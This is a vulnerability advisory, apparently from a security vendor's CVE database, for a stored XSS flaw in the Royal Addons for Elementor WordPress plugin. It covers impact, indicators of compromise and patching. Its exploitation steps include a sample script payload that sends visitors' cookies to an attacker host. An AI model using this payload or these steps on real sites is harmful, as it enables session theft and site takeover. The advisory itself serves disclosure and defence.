CVE-2026-0664: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-0664 is a Stored Cross-Site Scripting (XSS) vulnerability in the Royal Addons for Elementor plugin for WordPress, affecting all versions up to and including 1.7.1049. The flaw exists in the button_text parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with contributor-level access or above to inject persistent malicious scripts. It was published on April 4, 2026, with a patch available in version 1.7.1050. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS variant. The button_text parameter in the plugin's form builder widget (wpr-form-builder.php) fails to properly sanitize user-supplied input before storing it and escape it before rendering it in page output. An authenticated attacker with at minimum contributor-level WordPress access can submit a crafted payload via this parameter, which is then persistently stored and executed in the browser of any user who visits the affected page. The fix was introduced in version 1.7.1050, as evidenced by changes in the plugin's Trac repository (GitHub Advisory, Wordfence).

Impact

Successful exploitation allows an authenticated contributor to inject arbitrary JavaScript that executes in the context of any site visitor's browser, impacting both confidentiality (e.g., session cookie theft, credential harvesting) and integrity (e.g., page content manipulation, redirection to malicious sites). Because the injected script persists in the database and fires for all users visiting the affected page, the blast radius extends to all site visitors including administrators, potentially enabling privilege escalation or full site takeover. Availability is not directly impacted by this vulnerability (GitHub Advisory, Wordfence).

Exploitability

There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the time of publication (GitHub Advisory). The EPSS score is approximately 0.01% (2nd percentile), indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a contributor-level WordPress account, which limits opportunistic mass exploitation but remains a realistic threat in multi-author or open-registration WordPress environments.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Royal Addons for Elementor plugin at version 1.7.1049 or earlier, using tools like WPScan or by inspecting plugin metadata in publicly accessible readme files.
  2. Obtain contributor access: Register or compromise a contributor-level (or higher) WordPress account on the target site.
  3. Navigate to the form builder widget: In the WordPress editor (Elementor), add or edit a page containing the Royal Addons Form Builder widget.
  4. Inject malicious payload: In the button_text parameter field, enter a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.
  5. Save and publish: Save the page, causing the unsanitized payload to be stored in the WordPress database.
  6. Trigger execution: When any user (including administrators) visits the page, the injected script executes in their browser, enabling session hijacking, credential theft, or further malicious actions (GitHub Advisory, Wordfence).

Indicators of compromise

  • Database: Unexpected JavaScript or HTML script tags stored in the button_text field of Royal Addons form builder widget data within the WordPress wp_posts or wp_postmeta tables.
  • Logs: WordPress access logs showing POST requests to Elementor/page editor endpoints by contributor-level accounts, particularly with encoded or obfuscated content in form parameters.
  • Network: Outbound requests from site visitors' browsers to unknown external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from pages containing Royal Addons form builder widgets.
  • File System: No direct file system artifacts expected for stored XSS, but review plugin files in wp-content/plugins/royal-elementor-addons/ for unauthorized modifications.

Mitigation and workarounds

Update the Royal Addons for Elementor plugin to version 1.7.1050 or later, which contains the fix for improper output escaping in the button_text parameter (GitHub Advisory, Wordfence). As an interim measure, restrict contributor-level access to trusted users only and audit existing pages for suspicious content in form builder widgets. A Web Application Firewall (WAF) with XSS filtering rules can provide additional defense-in-depth while patching is pending.

Community reactions

Sucuri included CVE-2026-0664 in their April 2026 vulnerability patch roundup, highlighting it as part of broader WordPress plugin security concerns (Sucuri Blog). The vulnerability was assigned and disclosed by Wordfence, which maintains a dedicated threat intelligence entry for it. No significant broader media coverage or notable researcher commentary beyond standard vulnerability aggregation was identified.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management